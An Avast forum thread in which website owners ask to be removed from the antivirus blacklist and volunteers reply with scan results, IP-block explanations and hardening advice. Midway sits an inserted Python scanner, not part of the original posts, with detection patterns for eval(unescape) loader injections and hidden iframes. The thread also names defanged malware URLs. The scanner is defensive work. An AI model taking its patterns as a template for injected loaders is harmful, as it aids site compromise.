Avast WEBforum

Other => Viruses and worms => Topic started by: Opus Conseil on June 18, 2013, 09:08:28 PM

Title: How to remove my website from your blacklist?
Post by: Opus Conseil on June 18, 2013, 09:08:28 PM
Hello,

Our website is reported as being in the Avast blacklist. Here is the domain name: wxw.opuscg.fr.
We are sure that our website is clean, therefore we would like you to take a look at it and remove it from your blacklist.

Sincerely,

Maud Démazure
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on June 18, 2013, 09:24:08 PM
Check your URL at   www.urlvoid.com

Also scan your URL at www.virustotal.com
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on June 18, 2013, 10:06:11 PM
(http://my.jetscreenshot.com/18363/20130618-jr3o-61kb.jpg)


Detection appears to be correct.

Sophos: threat Mal/HTMLGen-A.

Scumware.org reported hosted malware, variant of HTML/ScrInject.B.Gen.

Norton reports caution when visiting the link: 1 threat.

McAfee classified it as suspicious.

It is listed in the blacklist.


https://www.virustotal.com/pt/url/2d7892d4db5d94c1c83961b719d6ee602b9621c9a26510ffbcd1fc06e45425a9/analysis/1371585111/

http://quttera.com/detailed_report/www.opuscg.fr

http://sitecheck.sucuri.net/results/www.opuscg.fr


http://www.urlvoid.com/scan/opuscg.fr/

http://www.mcafee.com/threat-intelligence/domain/?domain=opuscg.fr

http://safeweb.norton.com/report/show?url=opuscg.fr

http://urlquery.net/report.php?id=3204412
Title: Re: How to remove my website from your blacklist?
Post by: Opus Conseil on July 09, 2013, 08:56:14 PM
Thank you for your return.

Bit Defender removed us from their blacklist. I am sure that our website does not present any malicious content. Could you please check it again?

Thank you very much!

Maud Démazure
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 09, 2013, 09:08:34 PM
Your site has vulnerable wp software, that needs updating...Wordpress Version 3.5 based on: htxp://opuscg.fr//wp-admin/js/common.js
: /home/opuscg5/public_html/opuscg.fr/wp-content/themes/ecobiz/index.php
A site sharing the same IP is a known PHISH: http://support.clean-mx.de/clean-mx/phishing.php?id=3222646
File an FP report to exclude your domain from the general IP blocking -> You can report a possible FP here: http://www.avast.com/contact-form.php

polonus
Title: Re: How to remove my website from your blacklist?
Post by: pellegriniagro on November 18, 2014, 08:22:03 PM
my website

http://esp.geoagris.com/

is also blocked. how can i unblock it?

Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: Lisandro on November 18, 2014, 09:25:56 PM
Quote from: pellegriniagro
> my website
>
> http://esp.geoagris.com/
>
> is also blocked. how can i unblock it?
>
> Thanks!

You can check your site with:
https://www.virustotal.com
http://zulu.zscaler.com
http://dnscheck.pingdom.com
http://www.siteadvisor.com

To check if a website is hosted on afraid.org, go to http://freedns.afraid.org/ and enter URL in the box you see in top right box and then click Trace button. Any domain hosted on afraid.org can be used by other persons for dns hosting without your control. If it happened for your domain, it was misused for malicious purposes - in that case, when nobody has control on subdomains of domain (DNS hijacking), we block the whole domain in order to protect our users. For you, the solution is most probably only changing the dns hosting and letting us know later (www.avast.com/contact-form.php).
Title: Re: How to remove my website from your blacklist?
Post by: Milos on November 18, 2014, 10:22:04 PM
Quote from: Lisandro
> Quote from: pellegriniagro
> > my website
> >
> > http://esp.geoagris.com/
> >
> > is also blocked. how can i unblock it?
> >
> > Thanks!
>
> You can check your site with:
> https://www.virustotal.com
> http://zulu.zscaler.com
> http://dnscheck.pingdom.com
> http://www.siteadvisor.com
>
> To check if a website is hosted on afraid.org, go to http://freedns.afraid.org/ and enter URL in the box you see in top right box and then click Trace button. Any domain hosted on afraid.org can be used by other persons for dns hosting without your control. If it happened for your domain, it was misused for malicious purposes - in that case, when nobody has control on subdomains of domain (DNS hijacking), we block the whole domain in order to protect our users. For you, the solution is most probably only changing the dns hosting and letting us know later (www.avast.com/contact-form.php).

Hello,
it should be fixed now.

Milos
Title: Re: How to remove my website from your blacklist?
Post by: polonus on November 18, 2014, 10:45:33 PM
Nice it has been fixed now. For site a couple of DNS issues have to be settled for that sub domain and the respectable parent nameservers.
Site had vi*gr* spam issues earlier.  Site-wide check report:
Suspicious

eoalggyw991ohh4tye8cwa"># buy vi*gr* at w*lm*rt # official online c*n*di*n ph*rm*cy <b>...</b></a></h3><div class="s"><d
(* by me, pol)
But system OK: http://www.closetnoc.org/?i=qh-in-f121.1e100.net

pol
Title: Re: How to remove my website from your blacklist?
Post by: Edi7 on December 05, 2014, 01:30:05 AM
Hello my site toplajme.org has been classified as malware i delete everything on database and ftp i re-install everything from beginning but again i scan my site and it's ok how can i re-enable again my site please help me.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on December 05, 2014, 01:54:51 AM
You first have to contact Google Safebrowsing as it is blocking your site in Google Chrome and firefox browser.
-> http://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Ftoplajme.org&hl=en
And it is not only avast that flags your site: https://www.virustotal.com/nl/url/428ae317377c39b05ff32aa472bf3d1425938202ccf8a31266f520932e2e3208/analysis/1417740333/

iFrame malware detected, see: http://sitecheck.sucuri.net/results/toplajme.org
Known javascript malware. Details: http://sucuri.net/malware/entry/MW:IFRAME:HD28
Outdated Web Server Apache Found: Apache/2.2.22
Attack explained: http://blogs.technet.com/b/srd/archive/2012/06/06/more-information-about-the-digital-certificates-used-to-sign-the-flame-malware.aspx
Blacklisted from site: s10.histats dot com
wXw.histats dot com
External links blocked: htxp://wXw.histats.com
htxp://s10.histats.com/js15_gif.js
See: https://www.virustotal.com/nl/url/497f39dee3c921a0bf1a56d9d4720f3e86aad13e87bd11216a924ff81b448351/analysis/

polonus
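
A site owner re-checking a cleaned webroot for the kind of injection reported in the post above can search the files for the `eval(unescape('%..'))` loader shape and for hidden iframes, and separate those from plain `unescape` calls that only need a manual look. The Python script below is an added example, not part of the original post or of any scanner named in this thread; the patterns, the 8-escape threshold, the file suffixes and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote

# eval(unescape('<long run of %xx escapes>' ...): the loader shape. The closing
# parenthesis is not required, because injected code often concatenates strings.
LOADER = re.compile(
    r"eval\s*\(\s*unescape\s*\(\s*(['\"])((?:%[0-9a-fA-F]{2}){8,})\1")
# An iframe sized 0 or 1 pixel, or styled invisible.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(?:(?:width|height)\s*=\s*['\"]?[01]\b"
    r"|display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>", re.I)
# Any other unescape() call: often legitimate library code, so only "review".
UNESCAPE = re.compile(r"\bunescape\s*\(")
WEB_SUFFIXES = {".php", ".js", ".html", ".htm"}  # assumed set of files to scan


def _line(text, pos):
    """1-based line number of a character offset."""
    return text.count("\n", 0, pos) + 1


def scan_text(text):
    """Return sorted (line, kind, detail) findings for one file's contents."""
    findings, loader_spans = [], []
    for m in LOADER.finditer(text):
        loader_spans.append(m.span())
        # JavaScript unescape() maps %xx to Latin-1 code points; decode the
        # literal so the owner can read what the script would have executed.
        decoded = unquote(m.group(2), encoding="latin-1")
        findings.append((_line(text, m.start()), "injected-loader", decoded[:60]))
    for m in HIDDEN_IFRAME.finditer(text):
        findings.append((_line(text, m.start()), "hidden-iframe", m.group(0)[:60]))
    for m in UNESCAPE.finditer(text):
        # Skip unescape() calls already reported as part of a loader.
        if not any(a <= m.start() < b for a, b in loader_spans):
            findings.append((_line(text, m.start()), "unescape-call", "review manually"))
    return sorted(findings)


def scan_tree(root):
    """Scan every web file under root; return {relative path: findings}."""
    results = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_SUFFIXES:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                results[path.relative_to(root).as_posix()] = hits
    return results


def demo():
    """Build a small constructed webroot and scan it."""
    # Constructed, harmless payload, percent-encoded the way the loader is.
    enc = "".join(f"%{b:02x}" for b in b"document.write('constructed sample')")
    files = {
        # Injected theme file: loader script plus a 1x1 iframe.
        "theme/footer.php": "<?php get_footer(); ?>\n"
                            "<script>eval(unescape('" + enc + "'));</script>\n"
                            '<iframe src="http://example.invalid/" width="1" height="1"></iframe>\n',
        # Library-style use of unescape(): flagged for review only.
        "js/lib.min.js": "var s=unescape(encodeURIComponent(t));\n",
        # Normal visible iframe: no finding.
        "index.html": '<iframe src="https://example.invalid/map" width="600" height="400"></iframe>\n',
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in files.items():
            target = Path(root, name)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_tree(root)


if __name__ == "__main__":
    for name, hits in demo().items():
        for line, kind, detail in hits:
            print(f"{name}:{line}: {kind}: {detail}")
```

To use it on a real site, call `scan_tree()` on a local copy of the webroot; an `injected-loader` or `hidden-iframe` hit that survives a reinstall points to a file or database template that was restored from an infected backup.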
Title: Re: How to remove my website from your blacklist?
Post by: Edi7 on December 05, 2014, 02:34:03 AM
Hi Polonus i checked again my site and i delete everything again how can i re enable again my site
Title: Re: How to remove my website from your blacklist?
Post by: Milos on December 05, 2014, 11:25:40 AM
Quote from: Opus Conseil
> Hello,
>
> Our website is reported as being in the Avast blacklist. Here is the domain name: wxw.opuscg.fr.
> We are sure that our website is clean, therefore we would like you to take a look at it and remove it from your blacklist.
>
> Sincerely,
>
> Maud Démazure

Hello,
domain was unblocked.

Milos
Title: Re: How to remove my website from your blacklist?
Post by: Milos on December 05, 2014, 11:27:47 AM
Quote from: Edi7
> Hello my site toplajme.org has been classified as malware i delete everything on database and ftp i re-install everything from beginning but again i scan my site and it's ok how can i re-enable again my site please help me.

Hello,
I don't see anything detected. Post screenshot of detection, please.

Milos
Title: Re: How to remove my website from your blacklist?
Post by: Edi7 on December 09, 2014, 12:46:15 AM
Hello Milos

This is the screenshot http://prntscr.com/5eqmh4 i contacted Name.com this is what they sent to me

Hello,

Thank you for contacting Name.com. We ran a malware and Virus scan and nothing was coming up on your site. Google usually runs a check every 48 hours, so the sites should be loading correctly after they recheck. To be safe, I strongly suggest you reset all your passwords, since it appears there was a problem with the site before, based on the error logs. If you need any further help, please don't hesitate to contact us and thank you for choosing Name.com!

i delete everything i changed every password everything and i can't see my site enable again
Title: Re: How to remove my website from your blacklist?
Post by: polonus on December 09, 2014, 01:40:38 AM
Sucuri still has iFrame malware detected: http://www.uploady.com/#!/download/VeJkIgvyeR6/OltbIVltZUVrL3IP

polonus
Title: Re: How to remove my website from your blacklist?
Post by: digitalconsult on December 20, 2014, 09:12:24 AM
please remove this website from your black list : http://www.galerie-art-africain.com

we got a problem 2 weeks ago, that has been fixed directly, we are clean
virustotal : https://www.virustotal.com/fr/url/13f66d2374acd2e500840e09571d45157f8613eeec91a46b1a4f39d6edf431a2/analysis/

Google safebrowsing : http://www.google.com/safebrowsing/diagnostic?site=http://www.galerie-art-africain.com

but avast continues to show warnings

best regards,
Title: Re: How to remove my website from your blacklist?
Post by: jimena.gamarra on January 09, 2015, 06:21:44 AM
My website is also in the blacklist.
I checked it at www.urlvoid.com and www.virustotal.com and it is now clean. Could you please remove http://www.universoregalos.com.ar from your blacklist?
Thanks!!
Title: Re: How to remove my website from your blacklist?
Post by: polonus on January 09, 2015, 06:49:35 AM
Hi  jimena.gamarra,

Your website has been blocked as part of a general IP block see:  https://www.virustotal.com/nl/ip-address/69.195.124.71/information/
You could ask for an exclusion of your website with a reference to this thread here at virus@avast.com .
The unblocking has to be performed by an avast team member and we here are not avast team members,
I for instance am just a volunteer with relevant knowledge.

However you should check this included script,htxp://cdn.dsultra.com/js/registrar.js, for malvertising, read http://forum.joomla.org/viewtopic.php?f=621&t=684752

Furthermore you have a suspicious iFrame check.

Some minor issues here: http://www.dnsinspect.com/universoregalos.com.ar/1420781615

You should take the following security issues up with bluehost - security header scan issues, re: http://www.uploady.com/#!/download/1cSSy3~52nH/RQ5HvNPXjM~Ga6wZ  (one header configured correctly and nine missing  :o )

IDS alerts here: http://urlquery.net/report.php?id=1420782872184

polonus (volunteer website security analyst and website error-hunter)

Title: Re: How to remove my website from your blacklist?
Post by: CristianRamos on January 25, 2015, 10:56:43 PM
Could you check my website?

http://www.pelaoramos.cl

I checked and no virus was found

https://www.virustotal.com/es/url/53829c6627b3fe24ef711b8ce526e0c1a16808c15bcbcc78dd014d05b3896906/analysis/

Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: polonus on January 25, 2015, 11:36:21 PM
Ola CristianRamos,

I assume that your website was blocked as part of a general IP block, see: https://www.virustotal.com/nl/ip-address/186.64.113.100/information/
Some other domains on that same IP address are reported because of PHISH-ing.
So you should ask an avast team member to make an exclusion for your website, here: https://www.avast.com/contact-form.php

There are some minor issues you should take up with those that host that website, nothing malicious but as part of general security recommendations. See: http://www.dnsinspect.com/pelaoramos.cl/1422224803
WARNING: Name servers software versions are exposed:
186.64.113.4: "9.8.2rc1-RedHat-9.8.2-0.30.rc1.el6_6.1"
190.114.254.28: "9.3.6-P1-RedHat-9.3.6-25.P1.el5_11.2"
208.71.173.199: "9.8.2rc1-RedHat-9.8.2-0.30.rc1.el6_6.1"
216.224.180.87: "9.3.6-P1-RedHat-9.3.6-25.P1.el5_11.2"
Exposing name server's versions may be risky, when a new vulnerability is found your name servers may be automatically exploited by script kiddies until you patch the system. Hide version.
Also the security header situation for your site demands attention, see: https://www.uploady.com/#!/download/CUl01_pPODR/FBy7x1GMO_ryOmwZ

Con Dios,
polonus (volunteer website security analyst and website error-hunter)

Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on January 27, 2015, 08:06:49 PM
Quote from: CristianRamos
> Could you check my website?
>
> http://www.pelaoramos.cl
>
> I checked and no virus was found
>
> https://www.virustotal.com/es/url/53829c6627b3fe24ef711b8ce526e0c1a16808c15bcbcc78dd014d05b3896906/analysis/
>
> Thanks!

Hello

Quote from: Lukas Havel
It's false positive. The detection will be fixed in the next VPS.
 We are sorry for the inconvenience.
 Best regards, Lukas Havel

Title: Re: How to remove my website from your blacklist?
Post by: Contato33 on February 19, 2015, 08:34:54 PM
My website is also in the blacklist.
I checked it at www.urlvoid.com and www.virustotal.com and it is now clean. Could you please remove http://www.janaynna.com.br from your blacklist?
Thanks!!
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on February 19, 2015, 08:51:18 PM
http://zulu.zscaler.com/submission/show/7c961750c81270e7dd2ad6f18af45544-1424374798
http://www.siteadvisor.com/sites/janaynna.com.br
https://www.virustotal.com/en/url/6a2114f7cf23b079f8ff92826c1ea166fce4eae521e349254a5f9dd567da3aa7/analysis/1424374677/
http://sitecheck.sucuri.net/results/www.janaynna.com.br
http://urlquery.net/report.php?id=1424374998821
http://urlquery.net/report.php?id=1424375017195
https://www.ssllabs.com/ssltest/analyze.html?d=janaynna.com.br&ignoreMismatch=on&latest
http://dnscheck.pingdom.com/?domain=www.janaynna.com.br
Title: Re: How to remove my website from your blacklist?
Post by: richard167 on February 19, 2015, 11:19:39 PM
Hi.
My website has been on a blacklist www.partypig.co.uk and i have rebuilt it on a new server. all software is up to date and it passes all the tests on :

http://freedns.afraid.org/domain/dnstrace.php?domain=www.partypig.co.uk&submit=Trace
https://www.virustotal.com
http://www.urlvoid.com/scan/partypig.co.uk/

and lots more places too. I have submitted requests through Avast antivirus software but its still blocked, hoping this is the place to get it a clean bill of health please !!!

thanks
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 19, 2015, 11:27:50 PM
Site cannot be resolved at the mo: http://www.dnsinspect.com/janaynna.com.br/1424384095
Has been taken down and not in namespace: janaynna.com.br,,,Not in namespace,
see: https://www.robtex.com/en/advisory/dns/br/com/janaynna/
Detected as Open Anonymous Proxy: http://www.liveipmap.com/162.144.44.17
mail abuse? -> http://antispam.imp.ch/05-uribl.php?lng=1
Warning—Incomplete Record
The record we received from the Whois server may be incomplete: http://whois.domaintools.com/janaynna.com.br
Server software outdated and vulnerable: Apache/2.4.10 (Unix) OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Attacked - long OVERDUE malware?

polonus
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 19, 2015, 11:36:43 PM
Hi richard167,

As far as I can establish your domain is victim of an IP block: http://anti-hacker-alliance.com/index.php?details=89.200.137.33
Issues here: http://www.dnsinspect.com/partypig.co.uk/1424384980
Ask for a domain exclusion, I cannot help you as I am a volunteer with relevant knowledge but not an avast team member and only they will unblock eventually.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: richard167 on February 20, 2015, 12:06:13 AM
Odd there are dozens of sites on that IP and this site only in last few weeks, what is an IP block please ? Also what is domain exclusion?
Thanks
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on February 22, 2015, 02:43:09 AM
Quote from: Contato33
> My website is also in the blacklist.
> I checked it at www.urlvoid.com and www.virustotal.com and it is now clean. Could you please remove http://www.janaynna.com.br from your blacklist?
> Thanks!!

Hello
there detected "hxxp://www.janaynna.com.br/_agenda/moto.jar"     
please confirm that this was clean ?
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on February 23, 2015, 08:42:24 AM
Richard167:
I am unblocking partypig.co.uk now.

Contato33:
It was indeed blocked because of janaynna.com.br/_agenda/moto.jar. Seeing it is a long time now, I am unblocking the domain, I hope the issue was already taken care of.
Title: Re: How to remove my website from your blacklist?
Post by: oneforallhosting on February 28, 2015, 08:56:46 PM
Powerquilting.com is blocked

From my host:

Your account was scanned for viruses/malware/iframes and none were found!
Furthermore, your site was scanned by numerous Online malware/iframe tools like:
- http://www.quttera.com/website-malware-scanner
- http://sitecheck.sucuri.net/results/powerquilting.com
- https://www.virustotal.com/en/url/814cd8a3cb9b06804d06aaa2a0372dee7945164492172b7afc2c952003d89145/analysis/1425139227/

Do you have more information about the "malware" that Avast is reporting? This could easily be a false positive.

From URLVOID

Powerquilting.com

No active threats were reported by the scanning engines.

From VIRUSTOTAL

URL:   http://powerquilting.com/
Detection ratio:   0 / 62
Analysis date:   2015-02-28 16:00:27 UTC ( 3 hours, 42 minutes ago )
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on February 28, 2015, 09:00:30 PM
You can report a possible FP here: https://www.avast.com/contact-us.php?subject=VIRUS-FILE
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on February 28, 2015, 09:08:45 PM
IP history  https://www.virustotal.com/nb/ip-address/72.52.194.226/information/
multiple domains on same IP, and many are blacklisted .... click more button under list(s) to see more

so seems like an IP block


Title: Re: How to remove my website from your blacklist?
Post by: oneforallhosting on March 01, 2015, 03:47:44 PM
Thanks, forwarded to host.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on March 01, 2015, 04:56:05 PM
Hi Edi7,

Re: http://sitecheck.sucuri.net/results/toplajme.org

It is this: http://labs.sucuri.net/db/malware/php-error-fatal-error?v7
Turns out it was because you probably forgot to close a comment block (forgot the */).
Re: Outdated Web Server Apache Found: Apache/2.2.22
Take this last issue up with your hoster.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Contato33 on March 03, 2015, 04:15:31 PM
Thanks for the feedback. Unlocked domain. ;) ;)
Title: Re: How to remove my website from your blacklist?
Post by: nethunter on March 05, 2015, 09:54:12 AM
Hi,

our site (http://www.assocoral.it), is in your blacklist.

We have cleaned it and removed malicious files, can you remove it from the blacklist?

Best regards
Title: Re: How to remove my website from your blacklist?
Post by: polonus on March 05, 2015, 12:41:23 PM
IP has 50 domains on one and the same IP address, which is known for PHISHing: http://permalink.gmane.org/gmane.comp.security.phishings/48825
It is not only Avast that alerts your site also WOT gives a bad web rep: https://www.mywot.com/en/scorecard/assocoral.it?utm_source=addon&utm_content=popup
because of phishing. Worse your site is a 100% PHISH: http://www.phishtank.com/phish_detail.php?phish_id=3003462
Potentially active malware: http://www.avgthreatlabs.com/website-safety-reports/domain/assocoral.it/
And more blacklists flagged it: http://www.yandex.com/infected?url=assocoral.it&l10n=en
Web application version:
Joomla Version 2.5.6 found at: htxp://www.assocoral.it/administrator/manifests/files/joomla.xml
Joomla version outdated: Upgrade required.
Outdated Joomla Found: Joomla under 2.5.26 or 3.3.5
This external link is flagged by WOT: https://www.mywot.com/en/scorecard/mns.it?utm_source=addon&utm_content=popup

Update your Open Source CMS.
Some blacklisting for site has been removed, wait for a final verdict from an avast team member
to reconsider the block. I am not an avast team member, just someone with relevant knowledge.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: vinz3 on March 27, 2015, 06:21:53 PM
Our website ocebo.com is safe but blacklisted. It's the same website and web server as ocebo.fr
Could you remove it from your blacklist please ? It's a real handicap for our business.

Best regards,
Title: Re: How to remove my website from your blacklist?
Post by: polonus on March 27, 2015, 06:42:01 PM
Has this been cleansed?
wXw.ocebo.fr/wp-content/themes/ocebo/js/owl.carousel.min.js?ver=20150310
Severity:   Potentially Suspicious
Reason:   Suspicious JavaScript code injection.
Details:   Detected hidden potentially suspicious procedure unescape Invoked procedure
File size[byte]:   40401
File type:   ASCII
Page/File MD5:   FFAA3C82AD2C6E216E68ACA44746E1BE
Scan duration[sec]:   1.632000

But this could rather be a bug than malcode

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Jon50 on April 17, 2015, 02:36:26 PM
We are a small shop hosting about 30 websites for our clients.  Haven't had a serious issue with Malware in a very long time, but we're still on the Avast blacklist.  Would you please check for me?  It affects all the sites we host at 67.43.12.14.

Thanks,

Jon
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on April 17, 2015, 06:07:20 PM
itindianapolishosting.com is not blocked by avast.
Title: Re: How to remove my website from your blacklist?
Post by: Jon50 on April 21, 2015, 01:40:15 AM
Please check itindianapolis.com.

Every time I try to load any site we host, Avast says "Threat has been detected" and the popup.

Even my autodiscover service in Outlook is flagged: http://autodiscover.indygb.com/autodiscover/autodiscover.xml

And no, http://itindianapolishosting.com/, won't load either.

Thanks for your help.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on April 21, 2015, 02:00:40 AM
Report it here  avast support   https://support.avast.com > avast virus lab

Title: Re: How to remove my website from your blacklist?
Post by: Eddy on April 21, 2015, 02:10:42 AM
As I said, http://itindianapolishosting.com is not blocked by avast.
I can open it without a problem with all shields active.
I suggest you check if your system isn't infected.
https://forum.avast.com/index.php?topic=53253.0
Title: Re: How to remove my website from your blacklist?
Post by: Jon50 on April 21, 2015, 02:14:11 AM
Indeed, Avast is blocking it on multiple machines that aren't infected.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 21, 2015, 08:58:56 AM
Produce the logs demanded here https://forum.avast.com/index.php?topic=53253.0
and a qualified remover may establish what is wrong on those so-called clean machines.

polonus

See attached how avast users see website home page
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on April 21, 2015, 01:17:28 PM
Different looks in different browsers ?
Title: Re: How to remove my website from your blacklist?
Post by: michaelallenlong on May 05, 2015, 10:22:42 PM
Our website, www.careerbridgeinc.com has been blocked. It is clean on Virus Total and other scanners. https://www.virustotal.com/en/url/53887789f3f8215cbb7f89dc21126f55fd331de7afa548517493c1d546c12333/analysis/.

Any idea why this is happening?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 05, 2015, 10:48:45 PM
Hi michaelallenlong,

More than likely a general IP block, over 200 domains share one and the same IP address.
See here: https://www.virustotal.com/nl/ip-address/192.254.235.141/information/
IP has PHISH malcode flags ->  https://www.virustotal.com/nl/ip-address/192.254.235.141/information/
I get a 502 Bad Gateway alert on nginx/1.4.6 (Ubuntu)  should be 1.8.0
Nothing here: http://urlquery.net/report.php?id=1430858796377
You could ask an exclusion here at virus@avast.com
Unblocking should be performed by an avast team member and we here aren't.

polonus

Title: Re: How to remove my website from your blacklist?
Post by: Eddy on May 05, 2015, 11:11:21 PM
michaelallenlong,

as clearly stated on the website, VirusTotal does not scan websites.

Blacklisted:
http://zulu.zscaler.com/submission/show/d3f2a3b7d15dc072f72a127c0a394d5d-1430859752

Blacklisted and malware detected:
http://urlquery.net/report.php?id=1430859939113
http://urlquery.net/report.php?id=1430859886593

Certificate and other issues:
https://www.ssllabs.com/ssltest/analyze.html?d=careerbridgeinc.com

And the list with problems goes on and on.
Title: Re: How to remove my website from your blacklist?
Post by: Jeef33 on May 06, 2015, 06:47:35 PM
My website, phase4fs.com, has also been blacklisted.  We fixed the DNS issue and it's now on GoDaddy servers.  All scans have been done and passed and there was never any viral activity.  Please de-list the site and reply back to my email or here to let me know.  Thanks
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on May 06, 2015, 07:13:10 PM
report it here   https://support.avast.com > avast virus lab


your wordpress is outdated   ;)   https://sitecheck.sucuri.net/results/phase4fs.com

IP history  https://www.virustotal.com/en/ip-address/66.96.160.142/information/
multiple domains on same IP and many are blacklisted

IP void  http://www.urlvoid.com/ip/66.96.160.142
Quote
IP ADDRESS: 66.96.160.142

We have found in our database of already analyzed websites that there are 149 websites hosted in the same web server with IP address 66.96.160.142 and IP hostname 142.160.96.66.static.eigbox.net. Remember that it is not good to have too many websites located in the same web server because if a website gets infected by malware, it can easily affect the online reputation of the IP address and also of all the other websites.


Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 06, 2015, 07:35:13 PM
Follow up for what Pondus advised you about CMS updates.
I found some additional issues that should be attended.

Your website is a Ghosted website.
Fail on Nameserver responding: FAIL: While quering domain's records, some of your name servers didn't responded. Name servers which didn't responded:
udp4:216.69.185.19
WARNING: We found different serial numbers on your name servers, it's OK if you had modified your zone recently.
WARNING: Domain doesn't have SPF record.  (spam vulnerable).

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Evgeniy L on May 08, 2015, 08:03:12 AM
Hi!

Our site http://www.betro.ru/ was blacklisted by AVAST but i can't see why it happened. Could someone please explain it to me?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 08, 2015, 02:39:18 PM
Hi Evgeniy L,

Probably a general IP block as there are over 650 domains on that same IP address,
see: https://www.virustotal.com/nl/ip-address/92.53.123.231/information/
92.53.123.231 is blacklisted by 1 websites using IP Blacklist Cloud Plugin.
Ask for an exclusion here at virus@avast.com

Just an issue to take up with hoster: WARNING: Name servers software versions are exposed:
92.53.116.200: "PowerDNS Authoritative Server 3.4.4 (jenkins@autotest.powerdns.com built 20150423104859 root@autotest.powerdns.com)"
92.53.116.26: "PowerDNS Authoritative Server 3.4.4 (jenkins@autotest.powerdns.com built 20150423104859 root@autotest.powerdns.com)"
92.53.98.100: "PowerDNS Authoritative Server 3.4.4 (jenkins@autotest.powerdns.com built 20150423104859 root@autotest.powerdns.com)"
92.53.98.42: "PowerDNS Authoritative Server 3.4.4 (jenkins@autotest.powerdns.com built 20150423104859 root@autotest.powerdns.com)"
Exposing name server's versions may be risky, when a new vulnerability is found your name servers may be automatically exploited by script kiddies until you patch the system.

Also check: Possible Frontend SPOF from:

fonts.googleapis.com - Whitelist
(88%) - <link href='http://fonts.googleapis.com/css?family=Open+Sans:400,800,800italic,700italic,700,600italic,600,400italic&subset=latin,cyrillic-ext' rel='stylesheet' type='text/css' />

DrWeb URL check = OK: Checking: -http://www.betro.ru
Engine version: 7.0.12.3050
Total virus-finding records: 5952542
File size: 41.50 KB
File MD5: a185472bd184310d17eb2215a0338398

-http://www.betro.ru - archive JS-HTML
>-http://www.betro.ru/JSTAG_1[566][83] - Ok
>-http://www.betro.ru/JSTAG_2[612][27d] - Ok
>-http://www.betro.ru/JSTAG_3[8b8][13e] - Ok
>-http://www.betro.ru/JSTAG_4[10a0][68] - Ok
>-http://www.betro.ru/JSTAG_5[1131][18f] - Ok
>-http://www.betro.ru/JSTAG_6[14b1][184] - Ok
>-http://www.betro.ru/JSTAG_7[a229][322] - Ok
-http://www.betro.ru - Ok 
Netcraft Risk Status All green: http://toolbar.netcraft.com/site_report?url=http://www.betro.ru

polonus
Title: Re: How to remove my website from your blacklist?
Post by: KPtif on August 24, 2015, 02:12:50 PM
Hello,

Since Saturday, my domain (smarteagle.ch) is blacklisted by Avast. I found out that the cause was that we were using freedns.afraid.org and that some random guy created a malicious subdomain.

I no longer use the services from freedns and have installed a DNS server on my own server. Everything seems fine for me now but the domain is still blacklisted.

I already have created a ticket on the Avast's support but no reply yet.

Can somebody tell me if everything is okay with my domain now and if it can be removed from the blacklist ?

Thank you !
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on August 24, 2015, 03:03:51 PM
Quote from: KPtif
> Hello,
>
> Since Saturday, my domain (smarteagle.ch) is blacklisted by Avast. I found out that the cause was that we were using freedns.afraid.org and that some random guy created a malicious subdomain.
>
> I no longer use the services from freedns and have installed a DNS server on my own server. Everything seems fine for me now but the domain is still blacklisted.
>
> I already have created a ticket on the Avast's support but no reply yet.
>
> Can somebody tell me if everything is okay with my domain now and if it can be removed from the blacklist ?
>
> Thank you !

what is your ticket number?

Title: Re: How to remove my website from your blacklist?
Post by: KPtif on August 24, 2015, 03:08:34 PM
My ticket number is : #XKU-888-98267
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on August 24, 2015, 03:16:46 PM
OK i will see if i can speed up the reply ... no guaranty   ;)

Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on August 24, 2015, 03:40:26 PM
Hi,
I am unblocking your domain now ;-)
Title: Re: How to remove my website from your blacklist?
Post by: KPtif on August 24, 2015, 03:50:42 PM
Okay ! Thank you for unblocking it and thanks Pondus for your help !
Title: Re: How to remove my website from your blacklist?
Post by: ScottAtCatalyst on August 24, 2015, 06:30:48 PM
Hi.  Our client's website is being blocked by Avast antivirus.  The domain is http://rsjcpa.com/

We have scanned and verified that there is nothing malicious on the domain.  We have scanned every known blacklist and everything comes up clean.  Sucuri, VirusTotal, etc.

How do we request a scan, confirmation and removal from the Avast blocked list?

Thank you in advance for any assistance?

-Scott
Title: Re: How to remove my website from your blacklist?
Post by: polonus on August 25, 2015, 12:17:55 AM
Site -rsjcpa.com is blocked by Avast as with URL:Mal.
Could be obfuscated packer code.

polonus
